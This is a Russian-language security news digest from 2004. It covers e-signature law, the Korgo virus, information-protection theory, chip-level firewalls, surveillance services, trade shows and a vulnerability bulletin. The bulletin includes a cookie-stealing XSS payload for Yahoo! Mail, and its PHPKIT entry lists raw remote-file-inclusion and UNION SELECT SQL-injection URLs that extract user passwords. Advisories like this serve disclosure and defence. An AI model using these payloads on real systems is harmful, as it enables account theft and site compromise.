В Молдавии появился законопроект об ЭЦП

Президент Молдавии Владимир Воронин направил в парламент страны законопроект «Об электронном документе и цифровой подписи» в рамках законодательной инициативы, сообщили в пресс-службе президента, сообщает пресс-центр ФЦП «Электронная Россия».

По мнению главы государства, юридическое признание электронной подписи позволит «исключить бюрократические барьеры, снизить уровень коррупции, и, в конечном счете, увеличить доходы в государственный бюджет».

"Принятие закона — обязательное условие для построения системы «электронного правительства», — подчеркнул В. Воронин.

Первый проект закона «О цифровой подписи» был одобрен правительством Молдавии в январе 2002 года. При его рассмотрении на уровне юридического управления и комиссий парламента выявлены недостатки, и документ был направлен на доработку, которая продолжалась около года, после чего департамент информационных технологий вышел с предложением распространить закон и на электронные документы.

В Молдавии цифровую подпись используют шесть банков и 2 тыс. юридических лиц.

Hangup Team атакует Интернет

Финская антивирусная компания F-Secure подозревает российскую хакерскую группу Hangup Team в создании нового компьютерного вируса – Korgo. Этот вирус ворует данные владельцев кредитных карточек во время осуществления покупок и заказов через Интернет, предупреждают "Ведомости".

Менеджер F-Secure Майкл Албрехт, отзываясь о вирусе Korgo, предупредил: “Существует реальная опасность того, что пароли доступа к банкам через Интернет могут оказаться в руках злоумышленников”. В сообщении F-Secure предполагаемыми авторами вируса называется российская хакерская команда Hangup Team.

Korgo использует примерно тот же механизм заражения, как и вирус Sasser, эпидемия которого прошла в начале мая. Поэтому специалисты антивирусной компании Sophos предостерегают от паники. “Все компании, серьезно относящиеся к своей безопасности, уже установили „заплатки“ против Sasser, а значит, обезопасили свои компьютеры от эпидемии нового вируса”, – говорит старший технологический консультант Sophos Грэхм Глулей.

Команда Hangup Team, именующая себя на собственном web-сайте “киберфашистами”, известна специалистам по компьютерной безопасности довольно давно. В “Лаборатории Касперского” полагают, что делом их рук может быть и опасный компьютерный вирус MyDoom. Он говорит, что HangupTeam прославилась активной пропагандой спаммерства, предложениями услуг по рассылке “мусорных” писем, вредоносных программ, обмену опытом и обучению вирусописательству.

На сайте HangupTeam есть даже отчет команды хакеров о работе в этом году: американские пользователи получили порядка 50 миллионов спам-писем, заразилось 1,5 миллионов компьютеров, а объем файлов с ворованными паролями “зашкалил за 5 гигабайт”, и их “распродали по дешевке компетентным в финансовом плане людям”. Подтвердить у Hangup Team авторство нового вируса Korgo изданию не удалось.

Банкиры, занимающиеся онлайновыми платежами, осознают опасность таких вирусов и советуют клиентам иметь для интернет-транзакций отдельную банковскую карту с небольшим лимитом.

Слабым утешением является только тот факт, что в России проблема мошенничества с платежными картами не так остра, как за рубежом, но именно она отпугивает многих клиентов.

Опрошенные “Ведомостями” представители компаний, принимающих платежи через Интернет, – American Airlines, United Arlines, Hilton, Hyatt, Sheraton, Delta, Continental Airlines, Western Union, Marriott, North-West Airlines и Wal-Mart – от комментариев на тему безопасности онлайновых транзакций воздержались.

Компьютерная информация как объект защиты

В современном мире существует очень немного вещей, которые можно сделать, не собирая, обобщая, генерируя либо не имея доступа к информации. Одно из первых определений компьютерной информации принадлежит М.Винеру. Он определял ее как “обозначение содержания, полученного с внешнего мира в процессе нашего приспособления к нему и приспособления к нему наших чувств. Процесс получения и использования информации является процессом нашего приспособления к случайностям внешней среды и нашей жизнедеятельности в этой среде”. Иными словами, под компьютерной информацией понималось средство, позволяющее снять неопределенность в познании того или иного объекта.

Отталкиваясь от способа сохранения и передачи, можно говорить о том, что компьютерная информация – это информация, передаваемая, обрабатываемая и сохраняемая с использованием электронно-вычислительной техники. Компьютерная информация может переноситься в пространстве, сохраняться во времени, передаваться иному субъекту или техническому приспособлению (например, другому компьютеру), подвергаться иным операциям. Наверное наиболее удачным будет следующее определение: "компьютерная информация" – это любая информация (данные), которая существует в электронном виде, находится в электронно-вычислительной машине либо на машинных носителях и которую можно создавать, изменять или использовать с помощью ЭВМ.

Проблема противодействия преступлениям в сфере использования компьютерных технологий, безусловно, связана с общей проблемой защиты информации и особенностью информации как объекта правоотношений. Особое внимание при решении этой проблемы следует уделять общественным отношениям, возникающим по поводу права собственности на информацию и исходных от нее. Такая особенность отражается и на признаках информации как предмета противоправных посягательств. При этом следует определить пути и средства защиты информации, права и обязанности субъектов информационных отношений, возникающих в связи с использованием, накоплением, обработкой и защитой информации, а также предусмотреть ответственность за противоправные действия в сфере защиты информации.

Закон Украины “Об информации” закрепил право граждан Украины на информацию, заложил правовые основы информационной деятельности. Среди важнейших достижений, закрепленных законом, следует назвать определение понятия информации (ст.1) и прав собственности на информацию (ст.38), установление основных принципов информационных отношений (ст.5) и определение государственной информационной политики (ст.6), одним из основных направлений которой является создание общей системы защиты информации.

В юридической литературе общее определение информации, в основу которого положено отражение как свойство материи, было дано А.И.Трусовым, который считал, что “...информация охватывает отражение предметов и явлений в человеческом сознании, явлений и процессов друг в друге, вне связи с сознанием». В такой интерпретации, желает автор этого или нет, информация преподносится как некая “вещь в себе”. Еще шире понимает информацию Р.М. Ланцман. По его мнению, информация – это все то, «что отличает одно явление от другого, либо характеризует различные состояния одного явления».

Приведенные позиции свидетельствуют о том, что даже ссылки в определении понятия информации на категорию отражения, вне связи информации с ее потребителем, не спасает такое определение от серьезных методологических ошибок. Наверное, поэтому, и до сих пор в юридической литературе имеет место отождествление информации с отражением либо отбрасывание его связи с потребителем, с чем категорически нельзя согласиться.

Ценность информации является критерием при принятии любого решения о ее защите. И хотя было сделано немало разных попыток формализировать этот процесс с использованием методов теории информации и анализа решений, процесс оценки до сих пор остается весьма субъективным. Для оценки требуется распределение информации на категории не только в соответствии с ее ценностью, но и важностью.

Рассматривая информацию, как объект защиты, следует заметить, что информация – это результат отражения и обработки в человеческом сознании разнообразия окружающего мира, это сведения об окружающих человека предметах, явлениях природы, деятельности других людей и т.д. Сведения, которыми одно лицо обменивается через электронно-вычислительные машины (ЭВМ), с другим лицом либо ЭВМ, и являются предметом защиты.

NVIDIA и AMD обеспечивают повышенную безопасность для защиты настольных ПК

Учитывая необходимость предотвратить сетевые хакерские атаки и другие риски, связанные с защитой данных, NVIDIA Corporation (Nasdaq: NVDA) объявила о сотрудничестве с компанией AMD и ведущими тайваньскими производителями материнских плат для продвижения усовершенствованных решений защиты ПК и обеспечения инновационных возможностей и увеличенного уровня защиты для настольных ПК, рабочих станций и серверов на базе NVIDIA nForce™ и AMD64.

"Учитывая простой и затраты, необходимые для очистки систем после вирусных атак, наша компания и компания AMD понимаем необходимость в обеспечении функций безопасности прямо на уровне чипа", - сказал Дрю Генри (Drew Henry), генеральный менеджер по платформам в NVIDIA. "Сочетание MCP процессоров NVIDIA nForce с AMD Athlon FX и AMD Opteron обеспечивает пользователям лучшую платформу с высокой производительностью, широкими возможностями и защитой".

NVIDIA и AMD уже интегрировали функции высокой защиты на уровне чипа для предотвращения сетевых атак и других рисков, связанных с безопасностью данных. Решение NVIDIA Firewall интегрировано в новейшие медиа-коммуникационные процессоры NVIDIA nForce для материнских плат на базе AMD Athlon™ и AMD Opteron™. Это обеспечивает защиту на уровне драйвера при подключении ПК к сети Интернет или внутренним сетям, а также графический интерфейс, позволяющий пользователям конфигурировать Firewall, легко изменять настройки и управлять параметрами безопасности дистанционно.

Процессоры AMD64, включающие семейства AMD Athlon 64 FX и AMD Opteron, поддерживают технологию защиты от вирусов EVP, которая будет работать с Windows® XP Service Pack 2 для устранения определенных рисков безопасности и вирусов, препятствуя атакам, переполняющим буфер. Сочетание MCP процессоров NVIDIA nForce с AMD Athlon 64 и AMD Opteron обеспечивает пользователям высокий уровень защиты. Компании NVIDIA и AMD обе работают над обеспечением технологий защиты нового поколения, чтобы сделать платформы ПК как можно надежнее.

"Безопасность ПК является одной из серьезных проблем, стоящих перед пользователями сегодня", -сказал Марти Сейер (Marty Seyer), вице-президент и генеральный менеджер Microprocessor Business Unit, AMD. "Вирусы снижают производительность. Без аппаратного обеспечения для борьбы с вирусами даже высокопроизводительные системы будут работать как компьютеры двадцатилетней давности. AMD и NVIDIA осознали данную проблему и стали искать пути ее решения. Технология AMD EVP, которая будет работать с Windows XP Service Pack 2, является отличным дополнением к технологии NVIDIA Firewall. Вместе они усиливают защиту ПК против растущего числа компьютерных атак".

NVIDIA также сотрудничает с ведущими тайваньскими производителями материнских плат, включая лидеров ASUSTeK и MSI, для продвижения их линеек плат на базе nForce с интегрированными функциями защиты для рынка систем на основе AMD64. Вместе компании объяснят потребителям важность безопасности ПК и начнут продвижение встроенной технологии защиты как предмета первой необходимости для сегодняшних энтузиастов.

"ASUSTeK пытается обеспечить пользователей лучшей технологией, и мы беспокоимся о безопасности также, как и о производительности", - сказал Джо Хси (Joe Hsieh), директор подразделения ASUS по выпуску плат. "Вместе NVIDIA и AMD помогают внедрить инновационные технологии защиты на рынок на уровне чипа, обеспечивая пользователей определенной степенью комфорта и защиты".

"Тот факт, что мы можем обеспечить эти инновационные возможности защиты без дополнительных затрат является действительно революционным", - сказал Г-н Рик Ву (Rick Wu), менеджер по маркетингу материнских плат в MSI. "Предоставляя защищенные системы, NVIDIA и AMD действительно обеспечивают новые уровни безопасности для сетей и компьютеров".

Основные материнские платы, включающие функции защиты от NVIDIA и AMD:

ASUS K8N-E Deluxe
Epox EP-8KDA3+
Gigabyte K8NSNXP-939
iWill DK8N
MSI MSI7025
MSI MSI7030

Пиратские Windows XP не получат долгожданный Service Pack 2

Пользователи пиратских копий Windows XP не смогут установить ключевые обновления системы, сообщает BBC News. Руководство Microsoft приняло решение, что готовящийся к выпуску SP2 не будет работать с самыми популярными пиратскими версиями операционной системы, сообщает Lenta.ru Этим летом Microsoft выпустит Service Pack 2 для Windows XP. Обновление системы закроет некоторые серьезные дыры в системе защиты и позволит более легко и надежно защищать компьютер от вирусов и атак. Британский представитель Microsoft Пол Рэндл заявил, что во время установки Service Pack 2 будет проверяться идентификационный номер копии Windows XP, работающей на компьютере, и обновление не будет устанавливаться, если копия системы пиратская. Пока неясно, как будет проходить обновление системы в странах, где подавляющее большинство установленных систем пиратские, отмечает BBC News. Так, по данным британского Business Software Alliance, 92 процента всего программного обеспечения в Китае пиратское. Традиционно установка обновлений для Windows на сайте Windows Update нормально работает как с легальными копиями, так и с пиратскими экземплярами этой ОС.

Конфиденциальность, целостность и доступность – три кита безопасности информации

Возросшая популярность пользования Интернетом, в особенности, для коммерческих и телекоммуникационных целей, в большой степени расширила возможности для корпораций разрабатывать новые системы поставок, лучше использовать человеческие ресурсы на глобальном уровне. Эти возможности ввели дополнительные требования для безопасности, непрерывной деловой активности и управления непредвиденными ситуациями, так как те же технологии, которые дают возможности глобального уровня, могут подвергнуть предприятие угрозам глобального уровня. Задачи безопасности продолжают расти как в сторону интенсивности, так и в сторону сложности.

Согласно исследовательской фирме «Гартнер», к 2005 году 60% стоимости инцидентов, связанных с недостатком безопасности, которым подвержены предприятия, будут мотивированы финансово либо политически. Большую часть финансовых потерь составляет ущерб, причиненный сотрудниками собственной компании.

Финансовые потери из-за компьютерных преступлений могут подняться до $ 10 миллиардов в год (согласно данным февральского выпуска журнала «Fortune»).

По данным исследований США, вероятность какой-либо компании подхватить вирус в последние годы увеличилась более чем на 15%.

Исходя из этого, в настоящее время для каждой корпоративной сети необходимо иметь четкую политику в области безопасности. Эта политика разрабатывается на основе анализа рисков, определения критически важных ресурсов и возможных угроз. Базовыми элементами политики в области безопасности являются идентификация, целостность и активная проверка. Идентификация призвана предотвратить угрозу несанкционированного доступа к ресурсам и данным. Целостность обеспечивает защиту от подслушивания и манипулирования данными, поддерживая конфиденциальность и неизменность передаваемой информации. Активная проверка (аудит) означает проверку правильности реализации элементов политики безопасности и помогает обнаруживать несанкционированное проникновение в сеть и атаки типа DoS.

Обеспечение безопасности системы – непрерывный процесс, который должен использовать постоянно развивающиеся методы, средства и технологии. Масштабы распространения информационного взаимодействия через Интернет связаны с деятельностью миллионов предприятий и частных лиц, и защита их интересов является задачей национального масштаба.

Тотальное слежение. "Корбина Видео" начинает работу

Телекоммуникационные компании одна за другой начали продвигать услуги дистанционного наблюдения, которые позволяют начальникам следить за подчиненными, родителям - за детьми, а женам - за мужьями.

До сих пор услуги слежения за объектами адресовались лишь автомобильному рынку. Около 30 компаний в Москве и порядка 10 фирм в Петербурге предлагают услуги позиционирования подвижных объектов, которыми активно пользуются владельцы дорогих автомобилей и автоперевозчики. Эти услуги, чаще всего опирающиеся на американские спутники GPS и GSM-сети, позволяют в режиме реального времени следить за перемещением автомобиля по электронной карте или получать его координаты с точностью до 30 метров в виде SMS-сообщений на сотовый телефон. Среди крупнейших игроков этого рынка - столичные фирмы "Цезарь Сателлит", "Автоконнекс" и "Русслайн.Ру" (марка RussGPS), а также петербургская "БалтАвтоПоиск" (марка "Аркан"). Все они оказывают услуги тем, кто сам хочет следить за своим автомобилем (см., например, новость ComNews.ru от 16 февраля 2004 г.).

Вчера, 3 июня, московская телекоммуникационная компания "Корбина Телеком" объявила о создании нового департамента - "Корбина Видео", одной из главных услуг которого станет видеонаблюдение. Услуга базируется на высокоскоростной Интернет-сети "Корбины" и вэб-камерах. Подписавшись на нее, руководители смогут наблюдать, что происходит во всех рабочих помещениях их компаний: на месте ли тот ли иной сотрудник, чем он занят и даже какие документы открыты на его компьютере. "Да, наша услуга дает менеджерам возможность контролировать все действия подчиненных. Но наш собственный опыт говорит о том, что это единственный способ, позволяющий быстро сделать из небольшой компании крупную", - говорит вице-президент "Корбина Телеком" Александр Малис. В отличие от громоздких систем видеонаблюдения, требующих установки дорогостоящих камер и видеозаписывающего оборудования, сервис "Корбина Видео" доступен даже небольшой фирме. По словам руководителя "Корбина Видео" Всеволода Гавриленко, в минимальном варианте достаточно установить неуправляемые камеры стоимостью $150-200 каждая (средством просмотра изображения является стандартный браузер Internet Explorer) и подключиться по выделенному каналу к Интернету на скорости не менее 256 кбит/с. При этом руководитель Интернет-департамента "Корбина Телеком" Дмитрий Малов сообщил репортеру ComNews.ru: "Скорость 256 кбит/с уже никого не удовлетворяет. Мы предлагаем Интернет-подключения на скоростях 2 Мбит/с и выше. При этом нам дешевле всего подключать абонента на скорости 100 Мбит/с". Затраты на аренду канала 2 Мбит/с с учетом передаваемого трафика составляет несколько сотен долларов в месяц (при средней стоимости передачи 1 Гбайт информации на уровне $20). При желании использовать управляемые камеры, которые позволяют на удалении поворачивать их во все стороны и приближать рассматриваемы предметы затраты клиента существенно возрастут: средняя стоимость управляемой камеры составляет $2000.

За два дня до "Корбины" свою услугу "принудительного слежения" запустил оператор сотовой связи "Соник Дуо" (оператор сети "МегаФон" в Москве и Московской области). Эта услуга, созданная на базе сервиса "Автоматический Определитель местоПоложения" (АОП) и технологии LBS (технология мобильного позиционирования), получила название "АОП-семья". Используя услугу "АОП-Семья", абонент сможет в любой момент с высокой точностью узнать местоположение своего ребенка в пределах Москвы и области (см. новость ComNews.ru от 1 июня 2004 г.). "Тема безопасности детей актуальна всегда, особенно в таком большом городе, как Москва. Когда точно знаешь, где находится твой ребенок, чувствуешь себя намного спокойнее", - говорит Игорь Парфенов, и.о. гендиректора ЗАО "Соник Дуо".

Специалисты не боятся, что развитие телекоммуникаций приведет к тотальному слежению за сотрудниками и членами семьи. Коммерческий директор "Соник Дуо" Элдар Разроев, который с 15 июня займет пост президента "Евросети", сказал репортеру ComNews.ru: "Телекоммуникации никогда не превратятся в "Большого брата". Точность определения координат объекта в сотовых сетях такова, что это неэффективно для недобрых намерений. Кроме того, ребенок или любой другой участник услуг "АОП-Семья" может просто выключить сотовый телефон и оказаться вне контроля".

Юлия Никитина, управляющий партнер петербургского офиса фирмы Boyden, занимающейся подбором высшего персонала, считает: "Действие рождает противодействие. Если услуга видеонаблюдения достаточно дешева, то сотрудники, узнав о слежке, вполне могут скинуться на такую же систему и поставить ее в доме начальника или в квартире его любовницы". Она полагает, что гораздо эффективнее разработать систему мотивации персонала, хотя это и дороже, чем установка вэб-камер.

"Корбина Телеком" начала эксперименты с передачей потокового видеосигнала около двух лет назад. Постепенно из группы энтузиастов это направление превратилось в лабораторию, на базе которой в итоге было решено создать подразделение "Корбина Видео". Суммарные затраты на исследования составили $230 тыс., при этом "Корбина Телеком" обрела около 25 ноу-хау, част из которых проходит сейчас процесс патентования.
Помимо услуг видеонаблюдения, "Корбина Видео" будет организовывать видеоконференции и предлагать передачу аудио- и видеоинформации. Все три услуги организуются поверх IP-сети. Системы вилдеонаблюдения и охраны "Корбина Видео" намерена продвигать как коробочные продукты, а в остальных сервисах основная роль компании будет состоять в консалтинге, прежде всего - в помощи абоненту с подбором оборудования под его задачи.
"Корбина Видео" также планирует организовать постоянные трансляции нескольких телевизионных каналов по IP-сетям. Сейчас компания ведет переговоры об этом сразу с несколькими каналами, а для тестирования услуги организовала специальный портал www.corbina.tv. Конечная цель "Корбины" - подхлестнуть увеличение объемов трафика за счет использования новых сервисов. По данным Дмитрия Малова, около 300 клиентов "Корбины" уже используют видео-услуги, при этом компания ежемесячно подключает по выделенным линиям около 100 новых Интернет-пользователей.

Обзор уведомлений от дистрибьюторов операционных систем (31 мая - 6 июня 2004 года)

ProST - первая выставка по безопасности в центре «Крокус Экспо»

В России, и в частности в Москве, давно назрела необходимость нового, удобного и вместительного выставочного павильона. Организаторы ProST прекрасно понимают, как важно для экспонента представить себя в выгодном свете. Теперь это возможно на ProSTе.

Выставка профессиональной техники для обеспечения безопасности ProST-2004 пройдет в Международном выставочном центре «Крокус Экспо». Это будет первая выставка, сделавшая выбор в пользу качества предоставляемых услуг своим экспонентам и посетителям.

Комплекс предназначен для проведения крупных международных выставок различного профиля с участием российских и иностранных компаний.

Центр расположен в непосредственной близости от Московской кольцевой автомобильной дороги, около пересечения с Волоколамским шоссе и включает четыре павильона общей площадью 43,9 тыс. кв. м.

Выставочный центр спроектирован в соответствии с самыми высокими международными стандартами с использованием современных архитектурных решений и строительных материалов. Все выставочные залы оборудованы системами электро- и водоснабжения, вентиляции и кондиционирования, подачи сжатого воздуха на стенды, а также средствами охраны, обеспечения безопасности и противопожарной защиты. Высота здания до перекрытий - 9,3 м.

Он позволит экспонентам максимально подробно и полноценно представлять продукцию. Павильон включает в себя несколько комфортабельных конференц-залов, в которых пройдут мероприятия деловой программы. Выставочный центр имеет два ресторана и сеть выносных кафе.

Расположение центра на внешней стороне МКАД (66-й км) делает максимально удобным подъезд к нему как большегрузных автомобилей с экспонатами и выставочным оборудованием, так и легкового автотранспорта.

Для посетителей используется один главный вход, ведущий в регистрационный зал (3 000 кв.м.), из которого можно пройти в павильоны к экспозициям. Для пешеходов дорога на выставку продумана до мелочей – регулярно курсируют специальные комфортабельные автобусы от станций метро Планерная и Тушинская.

Основная тематические направления ProST-2004: видеонаблюдение, СКУД, ОПС

Место проведения – выставочный павильон «Крокус Экспо», 7-10 cентября

Контакты: (095) 937 40 81, 937 40 82

Новосибирск: семинар по безопасности московских компаний

10 июня в городе Новосибирске состоится семинар «Системы контроля доступа. Современные подходы к решению вопросов безопасности. Цифровые системы видеонаблюдения.»

Семинар организован компанией «CиТиГруп Инжиниринг» совместно с компаниями DSSL и PERCo. Основная тема семинара – обсуждение новых технологий и систем цифрового видеонаблюдения, обзор систем контроля доступа, обеспечение безопасности на предприятиях. Программа ориентирована на руководителей служб безопасности и IT-подразделений крупных и средних предприятий Новосибирска, торговых компаний и государственных учреждений. Помимо выступления представителей компаний-организаторов, будет демонстрироваться выпускаемое ими оборудование.

Семинар проводится бесплатно и в нем могут принять участие все заинтересованные лица.

Предварительная регистрация и справки по адресу: as@dssl.ru

Межсайтовый скриптинг в Yahoo! Mail

Программа: Yahoo! Mail Опасность: Наличие эксплоита: Да Описание: Уязвимость обнаружена в Yahoo! Mail. Удаленный пользователь может выполнить XSS нападение. Удаленный пользователь может послать специально обработанный email к целевому Yahoo! Mail пользователю, чтобы обойти XSS фильтр. Пример: <div style="background-image:url(jav ascript:alert(document.cookie))">Hello!</div> URL производителя: http://mail.yahoo.com/ Решение:Уязвимость устранена 24 мая

Подмена строки состояния в Web браузере Opera

Программа: Opera 7.5 и более ранние версии Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в Opera браузере. Удаленный пользователь может подменить различные строки текущего состояния, используя иконки ярлыков. Удаленный пользователь может создать специально обработанный файл иконок ярлыков необычно широкого размера, чтобы распространится на URL в адресной строке. Удаленный пользователь может сконструировать изображение, которое выглядит как адрес в адресной строке Opera и может включить иконку ярлыка, используя следующий HTML: Пример/Эксплоит: http://security.greymagic.com/security/advisories/gm007-op/ URL производителя: http://www.opera.com/ Решение:Установите обновленную версию программы (7.5.1): http://www.opera.com/download/

Уязвимость в PHP на Slackware Linux системах

Программа: PHP Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в PHP на Slackware Linux. Локальный пользователь может аварийно завершить работу PHP или выполнить произвольный код. Локальный пользователь может положить злонамеренную общедоступную библиотеку в небезопасное расположение. Затем, когда PHP откомпилирован, общедоступная библиотека будет встроена в PHP. В результате, PHP может аварийно завершить работу или выполнить произвольный код с привилегиями пользователя, запустившего PHP. URL производителя: http://www.php.net Решение:Установите соответствующее обновление: Updated package for Slackware 8.1: ftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/php-4.3.6-i386-1.tgz Updated package for Slackware 9.0: ftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/php-4.3.6-i386-1.tgz Updated package for Slackware 9.1: ftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/php-4.3.6-i486-1.tgz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/php-4.3.6-i486-4.tgz The MD5 signatures are: Slackware 8.1 package: cee32e839211a37b0081615b4112b87f php-4.3.6-i386-1.tgz Slackware 9.0 package: eaa0c69981f0aa8cc6b2d4ef0269481c php-4.3.6-i386-1.tgz Slackware 9.1 package: 007c48e42d292819b6cdc66e2e8334e0 php-4.3.6-i486-1.tgz Slackware -current package: 07bcba5e37538f16941141c43006cec1 php-4.3.6-i486-4.tgz

Отказ в обслуживании в Qualcomm Eudora Internet Mail Server

Программа: Qualcomm Eudora Internet Mail Server for Mac OS 7 Опасность: Высокая Наличие эксплоита: Нет Описание: Обнаружено переполнение кучи в Qualcomm Eudora Internet Mail Server for Mac OS 7. Удаленный атакующий может вызвать отказ в обслуживании или выполнить произвольный код на уязвимой системе. Уязвимость существует из-за недостаточной проверки данных, получаемых на 105 порт. URL производителя:http://www.eudora.com/free/servers.html Решение: На данный момент не существует решения этой проблемы.

Множественные уязвимости в PHPKIT

 http://hanter/include.php?path=/home/devil.php

 http://hanter/admin/admin.php?path=http://host/devil.php

 
http://hanter/include.php?path=update_1602.php

http://hanter/include.php?path=comment/comment.php&comcat=gb&subid=1'+UNION+SELECT+null,null,user_email,
user_name,null,null,null,null,user_pw,null,null,null+FROM+phpkit_user+WHERE+user_id='1

http://hanter/include.php?path=login/member.php&order=nick&usernick='+UNION+SELECT+null,null,null,null,null,
null,user_pw,null,null,user_name,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM
+phpkit_user+WHERE+user_name+LIKE+'%

http://hanter/include.php?path=comment/comment.php&subid=1&comcat=gb'+UNION+SELECT+null,null,null,null,
user_name,null,user_pw,null+FROM+phpkit_user+WHERE+user_id='1
 
 +

http://hanter/include.php?path=login/userinfo.php&id='sql-inj
http://hanter/include.php?path=content/overview.php&type=1&letter='sql-inj
http://hanter/include.php?path=forum/showcat.php&catid='sql-inj
http://hanter/include.php?path=login/imcenter.php&userid='sql-inj
http://hanter/include.php?newposttime='sql-inj&path=forum/main.php
http://hanter/include.php?path=forum/showthread.php&threadid=3'sql-inj
http://hanter/include.php?path=login/mailer.php&userid=1'sql-inj
http://hanter/include.php?path=content/download.php&contentid=14'sql-inj